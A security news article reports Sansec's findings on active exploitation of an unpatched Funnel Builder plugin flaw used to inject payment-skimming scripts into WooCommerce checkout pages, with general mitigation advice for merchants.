A critical security vulnerability in the Funnel Builder plugin for WordPress is now under active exploitation in the wild. Attackers are leveraging the flaw to inject malicious JavaScript code into WooCommerce checkout pages, aiming to steal payment data from customers.

The details of the ongoing activity were published by Sansec this week. According to the security firm, the vulnerability currently does not have an official CVE identifier, which often delays patch deployment and leaves systems exposed for longer periods.

Nature of the Attack

The exploitation targets sites running the Funnel Builder plugin, a popular tool used to create optimized sales funnels for WooCommerce. By exploiting the unpatched flaw, attackers can inject code directly into the checkout flow, a technique commonly known as formjacking or digital skimming.

This malicious code is designed to capture sensitive payment information such as credit card numbers, expiry dates, and CVV codes as customers enter them. The stolen data is then exfiltrated to a remote server controlled by the attackers.

Scope and Impact

Sansec has not disclosed the total number of sites affected, but given the widespread use of the Funnel Builder plugin among WooCommerce merchants, the potential impact is significant. WooCommerce powers a substantial portion of all online stores, making it a high value target for skimming campaigns.

The exploitation appears to be highly targeted, but the firm warns that automated scanning for vulnerable sites is likely underway. Merchants using the plugin are urged to treat the situation as critical and take immediate defensive measures.

Response and Mitigation

As of this publication, no official patch or advisory has been issued by the plugin developer. Without a CVE ID, the standard vulnerability disclosure process has not been triggered, which may delay coordinated remediation efforts.

Site administrators are advised to temporarily disable the Funnel Builder plugin if possible, or implement strict content security policies to limit script injection. Web application firewalls may also help block known attack patterns, though they are not a guaranteed fix.

Sansec recommends that all WooCommerce merchants review their checkout pages for unauthorized scripts, audit recent file changes, and monitor server logs for suspicious requests. Additionally, any site that processes credit card data should verify PCI DSS compliance to ensure proper data handling safeguards are in place.

Broader Context

The attack underscores a growing trend in e-commerce threats where vulnerabilities in third party plugins become gateways for payment skimming. Previous incidents involving WooCommerce have demonstrated how a single unpatched component can compromise thousands of online stores.

The absence of a CVE identifier also highlights structural gaps in how some plugin vulnerabilities are reported and tracked, leaving merchants without clear timelines for fixes.

Sites running outdated versions of the Funnel Builder plugin are considered at highest risk. Sansec has not specified which version numbers are vulnerable, but common practice suggests that all versions released before the discovery date should be considered suspect until a patch is confirmed.

Businesses using WooCommerce are encouraged to maintain a rigorous update schedule, limit the number of third party plugins, and conduct regular security audits of their digital storefronts.

Stolen payment data can be used for fraudulent transactions, sold on the dark web, or linked to identity theft schemes. Merchants may also face regulatory fines and reputational damage if customer data is compromised through their store.

The incident serves as a reminder that plugin ecosystems remain a weak point in e-commerce security, requiring constant vigilance from both developers and site operators.

Sansec has stated it will continue to monitor the situation and provide updates as more information becomes available. The firm expects that a formal CVE assignment and a patch from the plugin developer will follow, though no specific timeline has been provided.

Until an official fix is released, site owners must weigh business continuity needs against the risk of active exploitation and consider offline payment processing alternatives.